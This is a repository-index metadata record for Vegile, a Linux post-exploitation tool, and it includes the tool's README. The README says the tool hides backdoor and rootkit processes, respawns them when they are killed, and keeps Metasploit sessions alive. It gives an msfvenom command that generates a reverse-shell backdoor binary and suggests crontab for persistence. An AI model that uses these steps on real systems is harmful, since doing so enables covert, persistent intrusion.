{"id":13475512,"url":"https://github.com/Screetsec/Vegile","last_synced_at":"2025-03-27T00:31:30.908Z","repository":{"id":37663269,"uuid":"115978141","full_name":"screetsec/Vegile","owner":"screetsec","description":"This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell","archived":false,"fork":false,"pushed_at":"2022-09-01T01:54:35.000Z","size":50,"stargazers_count":722,"open_issues_count":2,"forks_count":164,"subscribers_count":40,"default_branch":"master","last_synced_at":"2025-03-21T08:02:46.478Z","etag":null,"topics":["backdoor","ghost","indonesia","infinite-scroll","inject","linux","metasploit","msfvenom","post-exploitation","postgresql","rootkit","unlimited"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/screetsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-01-02T05:29:48.000Z","updated_at":"2025-03-10T18:01:18.000Z","dependencies_parsed_at":"2022-08-02T15:46:08.846Z","dependency_job_id":null,"html_url":"https://github.com/screetsec/Vegile","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/screetsec%2FVegile","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/screetsec%2FVegile/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/screetsec%2FVegile/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/screetsec%2FVegile/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/screetsec","download_url":"https://codeload.github.com/screetsec/Vegile/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245760734,"owners_count":20667886,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","ghost","indonesia","infinite-scroll","inject","linux","metasploit","msfvenom","post-exploitation","postgresql","rootkit","unlimited"],"created_at":"2024-07-31T16:01:21.062Z","updated_at":"2025-03-27T00:31:30.654Z","avatar_url":"https://github.com/screetsec.png","language":"Shell","readme":"# Vegile - Ghost In The Shell\n\n[![Version](https://img.shields.io/badge/Vegile-Beta-brightgreen.svg?maxAge=259200)]()\n[![Stage](https://img.shields.io/badge/Release-Stable-brightgreen.svg)]()\n[![Build](https://img.shields.io/badge/Supported_OS-Linux-orange.svg)]()\n\n**Vegile** is a tool for **Post exploitation** Techniques in linux. Post Exploitation techniques will ensure that we maintain some level of **access and can potentially** lead to **deeper** footholds into our targets **trusted network**.\n\n\n\u003cimg src=\"https://user-images.githubusercontent.com/17976841/34869598-fd7cf00e-f7b9-11e7-950e-a4cb61364c03.png\" \u003e\u003c/img\u003e\n\n### Donate\n- If this project is very helpful to your penetration testing and u want to support me , you can give me a cup of coffee :)\n- [![Donation](https://img.shields.io/badge/bitcoin-donate-yellow.svg)](https://blockchain.info/id/address/1NuNTXo7Aato7XguFkvwYnTAFV2immXmjS)\n\n\n\n## :book: How it works\n\nThis tool will set up your ***backdoor/rootkits***\nwhen backdoor is already setup it will be ***hidden*** your specific process,***unlimited*** your ***session*** in metasploit and ***transparent***. Even when it is **killed**, it will **re-run again**. There will always be a procces which will **run** another process, so we can assume that this procces is **unstopable** like a **Ghost in The Shell**\n\n#### READ THIS\n\n- Right now I just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ **it works** ] or you can use thefatrat for to help you create a simple backdoor\n- **msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b \"\\x00\" -f elf -o NAME_BACKDOOR**\n- for hidden process you can use for **rootkits,backdoor,ransom and botnet** { sh,python,perl,exe and binary }.\n- Victim  target all linux distribution include ( **base32** and **base64** in their system ) \n- For get persistence you can use **crontab and xinit.d** into your backdoor  \n- this is just a simple algorithm how we can maintain our sessions and backdoor/rootkits , **you can explore this**\n\n\n\n## Getting Started\n1. ```git clone https://github.com/Screetsec/Vegile.git```\n2. ```cd Vegile```\n3. ```chmod +x Vegile```\n\n## Using Vegile\nRunning Vegile without any parameters will give a helpful list of the most common options. you can use command : \n\n- Vegile -i / --inject  **[backdoor/rootkit]**\n- Vegile -u / --unlimited **[backdoor/rootkit]**\n- Vegile -h / --help \n\n## Demo Video\n\n- [![Vegile demo](https://user-images.githubusercontent.com/17976841/34897525-f91afc1a-f820-11e7-9f85-bb0a5f00b4e3.JPG)](https://www.youtube.com/watch?v=oYyH1G3Lsvo \"Vegile Demo \")\n\n- [![Vegile demo](https://user-images.githubusercontent.com/17976841/34897524-f887a258-f820-11e7-9ceb-a39da5be6fdf.JPG)](https://www.youtube.com/watch?v=imlh8l5w56k \"Vegile Demo \")\n\n## :octocat: Credits\n\n- Thanks to allah \n- Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/ \n- Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .\n- Offensive Security for the awesome OS ( http://www.offensive-security.com/ )\n- http://www.kali.org/ Kali Linux\n- gianlucaborello to give a reference and some idea [ https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/ ] \n- And another open sources tool in github\n\n\n\n## Disclaimer\n\n***Note: modifications, changes, or alterations to this sourcecode is acceptable, however, any public releases utilizing this code must be approved by writen this tool ( Edo maland ).***\n","funding_links":[],"categories":["Uncategorized","Tools"],"sub_categories":["Uncategorized"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FScreetsec%2FVegile","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FScreetsec%2FVegile","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FScreetsec%2FVegile/lists"}